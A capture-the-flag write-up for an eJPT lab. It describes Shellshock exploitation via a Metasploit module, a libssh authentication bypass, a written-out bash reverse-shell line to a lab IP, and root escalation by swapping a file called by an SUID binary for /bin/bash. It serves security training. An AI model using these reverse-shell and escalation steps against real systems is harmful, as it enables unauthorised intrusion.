Continuing on with my eJPT certification, this time we’ll tackle the second CTF in the System-Host Based Attacks course.

In this lab we’re provided with two machine; target-1 and target-2. And we have 4 flags to capture :

  • Flag 1: Check the root (’/’) directory for a file that might hold the key to the first flag on target1.ine.local.
  • Flag 2: In the server’s root directory, there might be something hidden. Explore ‘/opt/apache/htdocs/’ carefully to find the next flag on target1.ine.local.
  • Flag 3: Investigate the user’s home directory and consider using ’libssh_auth_bypass’ to uncover the flag on target2.ine.local.
  • Flag 4: The most restricted areas often hold the most valuable secrets. Look into the ‘/root’ directory to find the hidden flag on target2.ine.local.

These would mostly be linux machines (since we’re in the linux section of the course), so let’s start by tackling both the first and second flag at the same time.

Flag 1 & 2

Tradition dictates to start with a service detection nmap scan even if we already have the confirmation that we would be mostly targeting an apache server on the first machine.

First nmap scan

Our assumption is confirmed; It seems to be an apache server running on a linux machine.

Webpage

Did you notice the address bar?

Webpage address bar

We spot a .cgi script. Let’s see if the Shellshock attack could give us access to the target. For that we’ll be using the metasploit module : exploit/multi/http/apache_mod_cgi_bash_env_exec.

metasploit-1

note : You can checkout my post about the Shellshock vulnerability, I judge it will get you more familiarity with it.

Flag 3

Without losing any time, let’s start on the second machine, with, of course, another service scan.

second nmap scan

We find a libssh instance running on the server and we’re told to use the ’libssh_auth_bypass’ on metasploit to try and access the machine.

metasploit-2

I sat up the action to ‘Execute’ and navigated to the user home directory; as told. And there we found the third flag.

Notice that the welcome file has the SUID permission is set up.

Flag 4

To capture the last flag, I decided to set up a netcat listener and have a reverse tcp session created through the ’libssh_auth_bypass’ :

bash -i>&/dev/tcp/172.16.116.1/1234 0>&1.

netcat one
metasploit-3
netcat two

We get a reverse shell on the machine with the user ‘user’.

Remember the welcome file? let’s see it we could exploit it to elevate our privileges.

strings welcome shell one

The welcome file mentions the greetings file, so if we could tamper with the greetings file to get us a privileged session we’d get access to the /root directory.

rm greetings

cp /bin/bash greetings

./welcome

shell two

And we got access to the root account, great! Let’s capture the last flag.

shell three

And that’s it, we’ve captured all flags.

Conclusion

Well that was once again a very easy CTF, but I enjoyed solving it.